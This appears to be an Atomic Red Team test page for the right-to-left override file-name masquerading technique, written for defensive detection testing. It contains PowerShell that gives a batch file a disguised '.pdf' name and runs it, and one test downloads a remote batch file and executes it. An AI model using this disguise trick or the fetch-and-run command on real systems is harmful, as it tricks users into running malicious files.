Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named
March 25 \u202Excod.scrwill display asMarch 25 rcs.docx. A JavaScript file namedphoto_high_re\u202Egnp.jswill be displayed asphoto_high_resj.png.(Citation: Infosecinstitute RTLO Technique)Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.
- Atomic Test #1: Masquerading: Right-to-Left Override Batch File Creation and Execution
- Atomic Test #2: Masquerading: RTLO Masqueraded File Download and Execution
'Creates a batch file and then uses the RTLO operator (0x202E) to transform the file name from "evil_batchfdp.bat" to "evil_batchtab.pdf". The script then executes the batch file which displays "Hello World!" for 30 seconds before closing out.'
Supported Platforms: Windows
auto_generated_guid: d7c03c7e-31cd-43c7-859a-ec053f73b23a
| Name | Description | Type | Default Value |
|---|---|---|---|
| fileloc | Input the file location. Default is the desktop. | path | [System.IO.Path]::Combine($env:USERPROFILE, "Desktop") |
$filepath = #{fileloc}
$rtlo = [char]0x202E
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
$payload = @"
@echo off
echo Hello World!
timeout /t 30 /nobreak
exit
"@
Set-Content -Path $fileloc -Value $payload -Encoding Ascii -Force
Write-Host "Real filename on disk: $fileloc"
Write-Host "Displays in explorer as: evil_batchtab.pdf"
Start-Process -FilePath $fileloc -Wait$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Remove-Item -Path $fileloc -Force -ErrorAction SilentlyContinueDownloads a batch file that has an obfuscated name utilizing the RTLO operator. The batch file then runs automatically, opening a cmd window and then closing 30 seconds later
Supported Platforms: Windows
auto_generated_guid: dac81590-8b63-4769-8b82-310beedc4f09
| Name | Description | Type | Default Value |
|---|---|---|---|
| fileloc | Location you want to download the file to. Default is the downloads folder | path | [System.IO.Path]::Combine($env:USERPROFILE, "Downloads") |
$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1036.002/src/evil_batch.bat" -OutFile $fileloc -UseBasicParsing | Out-Null
Start-Process -FilePath $fileloc$rtlo = [char]0x202E
$filepath = #{fileloc}
$fileloc = Join-Path "$filepath" ("evil_batch" + $rtlo + "fdp.bat")
Remove-Item -Path $fileloc -Force -ErrorAction SilentlyContinue